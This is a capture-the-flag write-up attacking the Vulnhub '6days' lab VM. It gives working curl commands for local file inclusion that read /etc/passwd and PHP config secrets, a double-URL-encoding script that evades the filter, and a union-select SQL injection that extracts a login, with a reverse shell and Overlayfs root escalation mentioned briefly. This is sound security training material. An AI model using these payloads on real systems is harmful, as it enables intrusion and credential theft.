Like any good pentester, I start off with a quick nmap scan and see what we are working with.


[email protected]:~/Vulnhub/6day# nmap -p- -T4 --min-rate=400 192.168.1.102

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-16 17:55 EDT
Nmap scan report for cypm (192.168.1.102)
Host is up (0.00088s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
8080/tcp filtered http-proxy
MAC Address: 00:0C:29:FB:09:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.13 seconds

A few interesting ports, usually where there is 80, there is gold. A few interesting things about the source on the index page though. Have a look.

[email protected]:~/Vulnhub/6day# curl -X OPTIONS -v http://192.168.1.102
* Rebuilt URL to: http://192.168.1.102/
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> OPTIONS / HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 21:56:18 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Vary: Accept-Encoding
< Content-Length: 1273
< Content-Type: text/html
< 
<html>
<head>
<title>Rashomon IPS - Main Page</title>
</head>
<body>
<h2>Rashomon Intrusion Prevention System</h2>
<h3>Become immune to every attack!</h3>
Today we're announcing our brand new product, Rashomon IPS! <br />
It's capable of blocking any <b>sophisticated cyber attack</b> which <u>can harm your 
precious customers.</u> (you don't want THAT to happen, do you?) <br />
<img 
src="http://192.168.1.102/image.php?src=https%3A%2f%2f4.bp.blogspot.com%2f-u8Jo4CEKQLk%2fV4OpiaoMJ7I%2fAAAAAAAAAiw%2f8kuCpTOpRWUAdp2p4GpegWdnOwxjwHNYQCLcB%2fs1600%2fphoto.jpg" 
/> <br />
(This guy is coming after your website!) <br />
<br />
Don't waste your time and money by hiring <font color="#ff00cc">pentesters</font> and 
doing real security audits. <br />
This is the best way to secure your organization and you can completely rely on it, 
and only it! <br />
<br />
IT'S SO SECURE WE EVEN USE IT ON OUR WEBSITE. <br />
<br />
So be quick and get a <u>%15 discount</u> on our newest product using the promocode 
<b>NONEEDFORPENTEST</b>. (discount will be available until yesterday)<br />
<br />
<form name="promo" method="GET" action="checkpromo.php">
Apply your promo code here: <input type="text" name="promocode">
<input type="submit" value="Apply Promo">
</form>
</body>
</html>
* Connection #0 to host 192.168.1.102 left intact

Do you see it? Yeah, the src tag for that image. It appears it’s pulling the image from an external site. That might be useful…

Image.php

So I suspect I might have an LFI/RFI here that could lead us to our shell. First I’ll confirm it.

[email protected]:~/Vulnhub/6day# curl -v http://192.168.1.102/image.php?src=/etc/passwd
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=/etc/passwd HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 22:27:56 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 1142
< Content-Type: image/jpeg
< 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
andrea:x:1001:1001::/home/andrea:/bin/andrea
* Connection #0 to host 192.168.1.102 left intact

Awesome, we can get /etc/passwd. I tried for shadow but that was a no go. At this point I try to see if I can include my own shell’s but sadly none of them would execute. Time to explore further.

[email protected]:~/Vulnhub/6day# curl -v 
"http://192.168.1.102/image.php?src=/etc/apache2/sites-available/default"
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=/etc/apache2/sites-available/default HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 22:55:27 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 952
< Content-Type: image/jpeg
< 
<VirtualHost *:8080>
	ServerAdmin [email protected]

	DocumentRoot /var/www
	<Directory />
		Options FollowSymLinks
		AllowOverride None
	</Directory>
	<Directory /var/www/>
		Options Indexes FollowSymLinks MultiViews
		AllowOverride None
		Order allow,deny
		allow from all
	</Directory>

	ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
	<Directory "/usr/lib/cgi-bin">
		AllowOverride None
		Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
		Order allow,deny
		Allow from all
	</Directory>

	ErrorLog ${APACHE_LOG_DIR}/error.log

	# Possible values include: debug, info, notice, warn, error, crit,
	# alert, emerg.
	LogLevel warn

	CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>
* Connection #0 to host 192.168.1.102 left intact

========================

[email protected]:~/Vulnhub/6day# curl -v 
"http://192.168.1.102/image.php?src=/var/www/checkpromo.php"
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=/var/www/checkpromo.php HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 22:56:21 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 565
< Content-Type: image/jpeg
< 
<?php
include 'config.php';

$conn = mysql_connect($servername, $username, $password);

if (!$conn) {
	die("Connection failed: " . $conn->connect_error);
}

$sql = "SELECT discount, status FROM promocodes WHERE 
promocode='".$_GET['promocode']."';";

mysql_select_db($dbname);
$result = mysql_query($sql, $conn);

if (!$result) {
	echo "Promocode not valid!";
} else {
	while($row = mysql_fetch_array($result, MYSQL_ASSOC))
	{
		if($row['status'] == 0)
			echo "Code expired!";
		else
			echo "You have %".$row['discount']." discount!";
	}
}

mysql_close($conn);
?>
* Connection #0 to host 192.168.1.102 left intact

=========================

[email protected]:~/Vulnhub/6day# curl -v 
"http://192.168.1.102/image.php?src=/var/www/config.php"
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=/var/www/config.php HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 22:57:03 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 114
< Content-Type: image/jpeg
< 
<?php
$servername = "localhost";
$username = "sellingstuff";
$password = "n0_\$\$_n0_g41ns";
$dbname = "fancydb";
* Connection #0 to host 192.168.1.102 left intact

A few interesting things stand out in these three files. First, the default config file for apache is showing that port 8080 is also hosting the page, but only allows connections from localhost. What I can guess from this is that we can likely bypass the WAF/IDS by trying the apparent SQL injection in checkpromo.php. I already know that our injection get’s blocked on checkpromo.php?promocode=.

Request Blocked

I also now know the name of the database in play here. Now it’s time to see if I can bypass that WAF/IDS. I tried a few encoding methods but none seemed to work until I ended up with this.

import urllib,sys

url = sys.argv[1]
sql = sys.argv[2]

enc = urllib.quote_plus(sql)
double = urllib.quote_plus(enc)
print "[+] Request: " + url + double+"\n"

Yup, that simple. I’m just going to double encode the injection string. From here I had to find the table and column names. Sadly sqlmap was no help, or I was using it wrong (probably the latter). So I just started guessing.

curl -v "http://192.168.1.102/image.php?src=http://localhost:8080/checkpromo.php?promocode=%2527union%2Ball%2Bselect%2Bconcat%2528username%252C%2527%253A%2527%252Cpassword%2529%252C1%2Bfrom%2Bfancydb.users%2523"
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=http://localhost:8080/checkpromo.php?promocode=%2527union%2Ball%2Bselect%2Bconcat%2528username%252C%2527%253A%2527%252Cpassword%2529%252C1%2Bfrom%2Bfancydb.users%2523 HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Wed, 17 Aug 2016 13:08:57 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 42
< Content-Type: image/jpeg
< 
* Connection #0 to host 192.168.1.102 left intact
You have %andrea:SayNoToPentests discount!

AWESOME! I now have the password for andrea. I can use those credentials for SSH, but the shell is very limited! I can run commands, but it looks like everything is directed to /dev/null as I get no output. Simple enough to bypass though if it’s truly executing commands. We’ll just pop a reverse shell in there.

Getting Shell

And now we have ourselves a pretty little shell.

Low Priv

Now all that’s left is to escalate. This was the easy part, The versioin of Ubuntu appeared vulnerable to a common Overlayfs exploit.

Getting Root

VICTORY

Flag